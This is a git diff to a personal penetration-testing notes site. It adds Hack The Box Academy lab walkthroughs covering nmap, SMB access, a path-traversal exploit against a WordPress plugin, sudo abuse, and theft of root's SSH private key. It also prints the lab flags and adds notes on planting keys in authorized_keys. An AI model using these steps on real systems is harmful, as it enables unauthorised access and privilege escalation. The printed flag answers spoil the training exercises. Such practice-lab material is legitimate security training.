fix: Links on deserialization notes

docs/burpsuite/burpsuite-insecure-deserialization.md

@@ -503,7 +503,7 @@ T
 ### Solution
 
 
-![Insecure deserialization](../img/indes_.png)
+![Insecure deserialization]()
 
 
 ```
@@ -524,7 +524,7 @@ T
 ### Solution
 
 
-![Insecure deserialization](../img/indes_.png)
+![Insecure deserialization]()
 
 
 ```
@@ -545,7 +545,7 @@ T
 ### Solution
 
 
-![Insecure deserialization](../img/indes_.png)
+![Insecure deserialization]()
 
 
 ```

docs/cpts-labs.md

@@ -5,28 +5,180 @@
 **Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080?**
 
 ```
-
+sudo nmap -sC -sV -p8080 $ip 
 ```
 
-**Results**: 
+**Results**: Apache Tomcat
 
 
 
 **Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on.**
 
 ```
+sudo nmap -sC -sV $ip
+```
+
+**Results**: 2323
+
+
+**List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.**
+
+```
+smbclient  /\/\10.129.125.178/\users -U bob
+# password: Welcome1. Included in the path explanation
+
+smb>dir
+smb>cd flag
+smb>get flag.txt
+smb>quit
+cat flag.txt
+```
+
+**Results**: dceece590f3284c3866305eb2473d099
+
+
+### [Web Enumeration](https://academy.hackthebox.com/module/77/section/728)
+
+**Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag.**
+
+```
+dirb http://94.237.55.246:55655/    
+# From enumeration you can get to dirb http://94.237.55.246:55655/robots.txt
+```
+
+Go to http://94.237.55.246:55655/robots.txt and you will notice http://94.237.55.246:55655/admin-login-page.php
+
+Visit it and, hardcoded in the site you will see:
+
+```
+                <!-- TODO: remove test credentials admin:password123 -->
+
+```
+
+Login into the app.
+
+**Results**: HTB{w3b_3num3r4710n_r3v34l5_53cr375}There are many retired boxes on the Hack The Box platform that are great for practicing Metasploit. Some of these include, but not limited to:
+
+
+### [Public Exploits](https://academy.hackthebox.com/module/77/section/843)
+
+
 
+Access to the web app at http://ip:36883
+
+The title of the wordpress post is "Simple Backup Plugin 2.7.10", which is a well-known vulnerable plugin. 
+
+```
+searchsploit Simple Backup Plugin 2.7.10
 ```
 
-**Results**: 
 
+```
+----------------------------------------------------------- ---------------------------------
+ Exploit Title                                             |  Path
+----------------------------------------------------------- ---------------------------------
+Simple Backup Plugin Python Exploit 2.7.10 - Path Traversa | php/webapps/51937.txt
+----------------------------------------------------------- ---------------------------------
+Shellcodes: No Results
+```
 
-List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.
 
 ```
+sudo cp /usr/share/exploitdb/exploits/php/webapps/51937.txt .
+mv 51937.txt 51937.py
+chmod +x 51937.py
+python ./51937.py http://83.136.255.162:36883/ "/flag.txt" 4
+#  target_url = sys.argv[1]
+#  file_name = sys.argv[2]
+#  depth = int(sys.argv[3])
+```
+
+
+**Results**: HTB{my_f1r57_h4ck}
+
 
+### [Privilege Escalation](https://academy.hackthebox.com/module/77/section/844)
+
+**SSH to $ip with user "user1" and password "password1". SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.**
+
+```
+ssh user1@$ip -p 31459
+# password1
+
+sudo -l
+# User user1 may run the following commands on
+#        ng-644144-gettingstartedprivesc-udbk3-5969ffb656-cp248:
+#    (user2 : user2) NOPASSWD: /bin/bash
+
+# One way: 
+echo #!/bin/bash > lala.sh
+echo cat /home/user2/flag.txt >> lala.sh
+chmod +x lala.sh
+sudo -u user2  /bin/bash lala.sh
+
+# Another
+sudo -u user2 /bin/bash -i
+```
+
+
+**Results**:  HTB{l473r4l_m0v3m3n7_70_4n07h3r_u53r}
+
+
+**Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.**
+
+Once you are user2, go to /root:
+
+```
+cd /root
+ls -la
+```
+
+
+```
+drwxr-x--- 1 root user2 4096 Feb 12  2021 .
+drwxr-xr-x 1 root root  4096 Jun  3 19:21 ..
+-rwxr-x--- 1 root user2    5 Aug 19  2020 .bash_history
+-rwxr-x--- 1 root user2 3106 Dec  5  2019 .bashrc
+-rwxr-x--- 1 root user2  161 Dec  5  2019 .profile
+drwxr-x--- 1 root user2 4096 Feb 12  2021 .ssh
+-rwxr-x--- 1 root user2 1309 Aug 19  2020 .viminfo
+-rw------- 1 root root    33 Feb 12  2021 flag.txt
+
+```
+
+So we have read access in .ssh folder. We can access and copy the private key 
+
+```
+cd .ssh
+cat id_rsa
+```
+
+```
+-----BEGIN OPENSSH PRIVATE KEY-----
+b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
+....
+QfPM8OxSjcVJCpAAAAEXJvb3RANzZkOTFmZTVjMjcwAQ==
+-----END OPENSSH PRIVATE KEY-----
+```
+
+In our attacker machine we save that id_rsa key in our folder
+
+```
+echo "the key" > id_rsa
+```
+
+And now we can login as root
+
+```
+ssh root@$ip -p 31459 -i id_rsa
+```
+
+And cat the flag:
+
+```
+cat /root/flag.txt 
 ```
 
-**Results**: 
 
 
+**Results**:  HTB{pr1v1l363_35c4l4710n_2_r007}

docs/htb-nibbles.md

@@ -9,7 +9,7 @@ tags:
   - CVE-2015-6967
 ---
 
-# Nibbles - A Hack The Box machine
+voy# Nibbles - A Hack The Box machine
 
 
 ```shell-session

docs/index-linux-privilege-escalation.md

@@ -36,7 +36,7 @@ lsb_release -a
 ## Enumeration scripts
 
 !!! abstract "Enumeration scripts"
-
+    
     - [Scan the Linux system with "linEnum"](linenum.md).
     - [Search for possible paths to escalate privileges with "linPEAS"](linpeas.md).
     - [Enumerate privileges with "Linux Privilege Checker" tool](linux-privilege-checker.md).

docs/machines.md

@@ -0,0 +1,23 @@
+
+
+
+
+| machine                                                                                                                              |                                                                                                                                                                                                                                |
+| ------------------------------------------------------------------------------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
+| [OWASP Juice Shop](https://owasp.org/www-project-juice-shop/)                                                                        | Is a modern vulnerable web application written in Node.js, Express, and Angular which showcases the entire [OWASP Top Ten](https://owasp.org/www-project-top-ten) along with many other real-world application security flaws. |
+| [Metasploitable 2](https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/)                                        | Is a purposefully vulnerable Ubuntu Linux VM that can be used to practice enumeration, automated, and manual exploitation.                                                                                                     |
+| [Metasploitable 3](https://github.com/rapid7/metasploitable3)                                                                        | Is a template for building a vulnerable Windows VM configured with a wide range of [vulnerabilities](https://github.com/rapid7/metasploitable3/wiki/Vulnerabilities).                                                          |
+| [DVWA](https://github.com/digininja/DVWA)                                                                                            | This is a vulnerable PHP/MySQL web application showcasing many common web application vulnerabilities with varying degrees of difficulty.                                                                                      |
+| [VAPI](https://www.postman.com/postman/workspace/owasp-api-security-top-10/collection/10499635-b9c71557-d441-42ab-9836-9adf828cf1fc) | vAPI is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top 10 scenarios in the means of Exercises.                                                                                 |
+| https://overthewire.org/wargames/                                                                                                    | The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games. Linux                                                                                  |
+| https://underthewire.tech/wargames                                                                                                   | The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games. Windows                                                                                |
+
+Pro Lab has a specific scenario and level of difficulty:
+
+| Lab           | Scenario                                                                                                                                                                           |
+| ------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| `Dante`       | Beginner-friendly to learn common pentesting techniques and methodologies, common pentesting tools, and common vulnerabilities.                                                    |
+| `Offshore`    | Active Directory lab that simulates a real-world corporate network.                                                                                                                |
+| `Cybernetics` | Simulates a fully-upgraded and up-to-date Active Directory network environment, which is hardened against attacks. It is aimed at experienced penetration testers and Red Teamers. |
+| `RastaLabs`   | Red Team simulation environment, featuring a combination of attacking misconfigurations and simulated users.                                                                       |
+| `APTLabs`     | This lab simulates a targeted attack by an external threat agent against an MSP (Managed Service Provider) and is the most advanced Pro Lab offered at this time.                  |

docs/spawn-a-shell.md

@@ -156,6 +156,7 @@ $ fg
 reset
 export SHELL=bash
 export TERM=xterm-256color
+stty size
 stty rows <num> columns <cols>
 
 # In one line:

docs/ssh-keys.md

@@ -13,16 +13,26 @@ tags:
 
 ## Read access to .ssh
 
-Having read access over the .ssh directory for a specific user, we may read their private ssh keys found in /home/user/.ssh/id_rsa or /root/.ssh/id_rsa, and use it to log in to the server.
+Having read access over the .ssh directory for a specific user, we may read their private ssh keys found in /home/user/.ssh/id_rsa or /root/.ssh/id_rsa, and we can copy it to our machine and use the -i flag to log in with it:
 
 ```shell-session
 vim id_rsa
 chmod 600 id_rsa
+# If ssh keys have lax permissions, i.e., maybe read by other people, the ssh server would prevent them from working.
 ssh [email protected] -i id_rsa
 ```
 
 ## Write access to .ssh
 
 Having write access over the .ssh directory for a specific user, we may place our public key in /home/user/.ssh/authorized_keys.
 
-But for this we need to have gained access first as that user. With this technique we obtain ssh access to the machine. 
+But for this we need to have gained access first as that user. With this technique we obtain ssh access to the machine. 
+
+```
+# Generating a public private rsa key pair
+ssh-keygen -f key
+```
+
+This will give us two files: `key` (which we will use with `ssh -i`) and `key.pub`, which we will copy to the remote machine.
+
+Let us copy `key.pub`, then on the remote machine, we will add it into `/root/.ssh/authorized_keys`:

docs/webexploitation/insecure-deserialization.md

@@ -195,7 +195,7 @@ It is important to note that the vulnerability is the deserialization of user-co
 
 **Java**: [ysoserial](../ysoserial.md)
 
-**PHP**: [phpggc](phpggc.md) 
+**PHP**: [phpggc](../phpggc.md) 
 
 > *About ysoserial: Not all of the gadget chains in ysoserial enable you to run arbitrary code. Instead, they may be useful for other purposes. For example, you can use the following ones to help you quickly detect insecure deserialization on virtually any server*:
 >	- *The `URLDNS` chain triggers a DNS lookup for a supplied URL. Most importantly, it does not rely on the target application using a specific vulnerable library and works in any known Java version. This makes it the most universal gadget chain for detection purposes. If you spot a serialized object in the traffic, you can try using this gadget chain to generate an object that triggers a DNS interaction with the Burp Collaborator server. If it does, you can be sure that deserialization occurred on your target.*

mkdocs.yml

@@ -298,6 +298,7 @@ nav:
       - HTTP Authentication schemes: webexploitation/http-authentication-schemes.md
       - HTTP headers: http-headers.md
       - Input filtering: input-filtering.md
+      - Machines and lab resources: machines.md
       - My mkdocs and material customized setup: my-mkdocs-material-customization.md
       - NetBIOS: netbios.md
       - Network traffic capture: network-traffic-capture.md